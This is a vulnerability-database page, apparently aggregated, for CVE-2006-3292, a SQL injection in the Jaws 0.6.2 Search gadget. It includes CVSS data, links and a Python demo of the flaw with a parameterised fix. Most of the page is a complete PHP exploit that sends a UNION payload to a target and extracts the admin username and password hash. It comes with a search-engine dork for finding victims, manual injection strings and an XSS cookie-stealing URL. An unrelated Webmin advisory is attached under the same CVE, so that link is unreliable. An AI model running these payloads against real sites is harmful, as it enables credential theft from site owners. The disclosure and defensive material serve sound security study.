CVE-2006-3292
CVSS7.5
Published: 2006-06-28 19:05:00
Revised: 2011-03-07 21:38:17

[Original] SQL injection vulnerability in the Search gadget in Jaws 0.6.2 allows remote attackers to execute arbitrary SQL commands via queries with the "LIKE" keyword in the searchdata parameter (search field).


[CNNVD] Jaws Search Gadget SQL Injection Vulnerability (CNNVD-200606-580)

        SQL injection vulnerability in the Search gadget of Jaws 0.6.2. A remote attacker can execute arbitrary SQL commands via a query containing the "LIKE" keyword in the searchdata parameter (the search field).
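The following is an added, runnable illustration of the bug class; it is not code from Jaws and not part of the exploit reproduced further down this page. The shape of the vulnerable query is an assumption reconstructed from the payload the exploit uses: `1%')` closes a `LIKE '%...%'` pattern and a surrounding parenthesis, the `UNION` supplies five columns to match the original `SELECT`, and a trailing `/*` comments out whatever the application appends. Table and column names (`search_index`, `users`, `passwd`), the sample rows and the admin hash are constructed for the demonstration, and SQLite stands in for the MySQL backend Jaws used, which is why the plain payload from the exploit's manual-exploitation notes is used rather than the `CONCAT()` variant.

```python
import sqlite3

# Constructed placeholder credential: the well-known md5("password") digest, in the
# 32-hex-character form the exploit's is_hash() check looks for.
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"

# Payload as given in the exploit's manual-exploitation notes. `/**/` replaces the
# spaces, `1%')` terminates the LIKE pattern and the parenthesis, and `/*` at the end
# turns the remainder of the application's query into a comment.
PAYLOAD = ("1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0"
           "/**/FROM/**/users/**/WHERE/**/id=1/*")


def make_db():
    """In-memory stand-in for the Jaws schema; table and column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, passwd TEXT);
        CREATE TABLE search_index(id INTEGER, title TEXT, url TEXT, gadget TEXT, created TEXT);
    """)
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    db.executemany("INSERT INTO search_index VALUES (?, ?, ?, ?, ?)", [
        (1, "Welcome to Jaws", "?gadget=Blog&id=1", "Blog", "2006-06-01"),
        (2, "Second post", "?gadget=Blog&id=2", "Blog", "2006-06-10"),
    ])
    return db


def search_vulnerable(db, searchdata):
    """Assumed shape of the pre-patch query: the search string is pasted straight into
    a LIKE pattern inside a parenthesised WHERE clause, five columns selected."""
    sql = ("SELECT id, title, url, gadget, created FROM search_index "
           "WHERE (title LIKE '%" + searchdata + "%')")
    return db.execute(sql).fetchall()


def escape_like(s):
    """Escape LIKE metacharacters so user input only ever matches literally."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_fixed(db, searchdata):
    """Hardened form: the pattern is bound as a parameter, so quotes, parentheses and
    comment sequences are data, and % / _ are escaped so they cannot widen the match."""
    sql = ("SELECT id, title, url, gadget, created FROM search_index "
           "WHERE (title LIKE ? ESCAPE '\\')")
    return db.execute(sql, ("%" + escape_like(searchdata) + "%",)).fetchall()


def leaked_credentials(rows):
    """Mimic the exploit's post-processing: find a row whose second column is a
    32-hex-char digest and return (username, hash), or None if nothing leaked."""
    for row in rows:
        candidate = str(row[1])
        if len(candidate) == 32 and all(c in "0123456789abcdef" for c in candidate):
            return (row[2], candidate)
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", leaked_credentials(search_vulnerable(db, PAYLOAD)))
    print("fixed:     ", leaked_credentials(search_fixed(db, PAYLOAD)))
    print("normal:    ", search_fixed(db, "Jaws"))
```

Against the concatenated query the payload returns the admin row in place of search results; against the parameterised query the same string is just a pattern that matches nothing, while an ordinary search still works. Binding the value is what closes the hole; the `ESCAPE` clause is the extra step that keeps a user from turning `%` or `_` into wildcards.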

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3292
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3292
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-580
(official data source) CNNVD

- Other links and resources

http://www.jaws-project.com/index.php?blog/show/29
(PATCH)  CONFIRM  http://www.jaws-project.com/index.php?blog/show/29
http://xforce.iss.net/xforce/xfdb/27334
(UNKNOWN)  XF  jaws-search-gadget-sql-injection(27334)
http://www.vupen.com/english/advisories/2006/2546
(UNKNOWN)  VUPEN  ADV-2006-2546
http://www.securityfocus.com/bid/18665
(UNKNOWN)  BID  18665
http://www.securityfocus.com/archive/1/archive/1/438434/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060626 Jaws <= 0.6.2 'Search gadget' SQL injection
http://secunia.com/advisories/20842
(VENDOR_ADVISORY)  SECUNIA  20842
http://retrogod.altervista.org/JAWS_062_sql.html
(UNKNOWN)  MISC  http://retrogod.altervista.org/JAWS_062_sql.html
http://securityreason.com/securityalert/1165
(UNKNOWN)  SREASON  1165

- Vulnerability information

Jaws Search Gadget SQL Injection Vulnerability
High risk  SQL injection
2006-06-28 00:00:00 2006-06-30 00:00:00
Remote
        SQL injection vulnerability in the Search gadget of Jaws 0.6.2. A remote attacker can execute arbitrary SQL commands via a query containing the "LIKE" keyword in the searchdata parameter (the search field).

- Advisories and patches

        No data available

- Vulnerability information (1946)

Jaws <= 0.6.2 (Search gadget) Remote SQL Injection Exploit (EDBID:1946)
php webapps
2006-06-23 Verified
0 rgod
N/A
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Jaws <= 0.6.2 'Search gadget' SQL injection / admin credentials disclosure\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "dork: \"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search\r\n\r\n";
/*
works regardless of php.ini settings
if 'Search gadget' is enabled
*/

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to jaws\r\n";
echo "Options:\r\n";
echo "   -T[prefix]   specify a table prefix different from default (no prefix)\r\n";
echo "                try blog_ even\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /jaws/ \r\n";
echo "php ".$argv[0]." localhost /jaws/ -Tblog_\r\n";
die;
}

# software site: http://www.jaws-project.com/
# manual exploitation:
#
# i)sql injection:
#   go to http://[target]/[path_to_jaws]/?gadget=Search
#   if search module is enabled, in search field type:
#
#   1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0/**/FROM/**/users/**/WHERE/**/id=1/*
#
#   or
#
#   1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0/**/FROM/**/blog_users/**/WHERE/**/id=1/*
#
#   now at screen you have admin username & password hash
#   this works with magic_quotes_gpc both on & off
#
# ii)xss:
#    http://[target]/[path_to_jaws]/gadgets/RssReader/extras/magpierss/scripts/magpie_slashbox.php?rss_url=<script>alert(document.cookie)</script>


error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    # keep reading until the end of the HTTP headers (CRLFCRLF) has been seen;
    # strpos() replaces the eregi() call of the original, which PHP 7 removed
    while ((!feof($ock)) or (strpos($html,"\r\n\r\n")===false)) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function is_hash($hash)
{
 # a 32-character lowercase hex string, i.e. an MD5 digest (preg_match() replaces the removed ereg())
 if (preg_match('/^[a-f0-9]{32}/',trim($hash))) {return true;}
 else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="";
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$sql="1%')/**/UNION/**/SELECT/**/0,CONCAT('*SUNTZU*',passwd,'*SUNTZU*'),CONCAT('*SUNTZOI*',username,'*SUNTZOI*'),0,0/**/FROM/**/".$prefix."users/**/WHERE/**/id=1/*";
$sql=urlencode($sql);
$data="gadget=Search";
$data.="&action=Results";
$data.="&gadgets=All";
$data.="&searchdata=".$sql;
$data.="&searchButton=Search";
$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (preg_match('/Gadget is not enabled/i',$html))
{
die("search gadget is not enabled... exploit failed");
}
$temp=explode('">*SUNTZOI*',$html);
$temp2=explode('*SUNTZOI*',$temp[1]);
$admin=$temp2[0];
$temp=explode('href="*SUNTZU*',$html);
$temp2=explode('*SUNTZU*',$temp[1]);
$hash=$temp2[0];
if (($admin<>'') and ($hash<>'') and (is_hash($hash)))
{
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$hash."\r\n";
echo "--------------------------------------------------------------------\r\n";
}
else
{
echo "Exploit failed, maybe wrong table prefix...";
}
?>

# milw0rm.com [2006-06-23]
		

- Vulnerability information (F48408)

Mandriva Linux Security Advisory 2006.125 (PacketStormID:F48408)
2006-07-20 00:00:00
Mandriva  mandriva.com
advisory,remote,arbitrary
linux,mandriva
CVE-2006-3292

Mandriva Linux Security Advisory MDKSA-2006-125 - Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:125
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : webmin
 Date    : July 18, 2006
 Affected: 2006.0, Corporate 3.0
 _______________________________________________________________________
 
 Problem Description:
 
 Webmin before 1.290 and Usermin before 1.220 calls the simplify_path
 function before decoding HTML, which allows remote attackers to read
 arbitrary files.  NOTE: This is a different issue than CVE-2006-3274.
 
 Updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3292
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 b389424c7b84f96e37c0db9dcb3e9b01  2006.0/RPMS/webmin-1.220-9.4.20060mdk.noarch.rpm
 eb4ea546b5d8a4a8401ddba2eee04aea  2006.0/SRPMS/webmin-1.220-9.4.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 b389424c7b84f96e37c0db9dcb3e9b01  x86_64/2006.0/RPMS/webmin-1.220-9.4.20060mdk.noarch.rpm
 eb4ea546b5d8a4a8401ddba2eee04aea  x86_64/2006.0/SRPMS/webmin-1.220-9.4.20060mdk.src.rpm

 Corporate 3.0:
 9c95b1373fe69a80ebfe6262921fcc52  corporate/3.0/RPMS/webmin-1.121-4.6.C30mdk.noarch.rpm
 fc39f0e98dc5dcece871c18f7a1f3e09  corporate/3.0/SRPMS/webmin-1.121-4.6.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 9c95b1373fe69a80ebfe6262921fcc52  x86_64/corporate/3.0/RPMS/webmin-1.121-4.6.C30mdk.noarch.rpm
 fc39f0e98dc5dcece871c18f7a1f3e09  x86_64/corporate/3.0/SRPMS/webmin-1.121-4.6.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEvVKCmqjQ0CJFipgRAmWyAKDk9ix6E2OrinJ/ShfDTY/FFrcH7wCgyu5Y
jO9m/w0DvTI55SpdrW0HDq0=
=SZvB
-----END PGP SIGNATURE-----

    

- Vulnerability information

26855
Jaws Search Function searchdata Field SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-06-26 Unknown
2006-06-26 Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.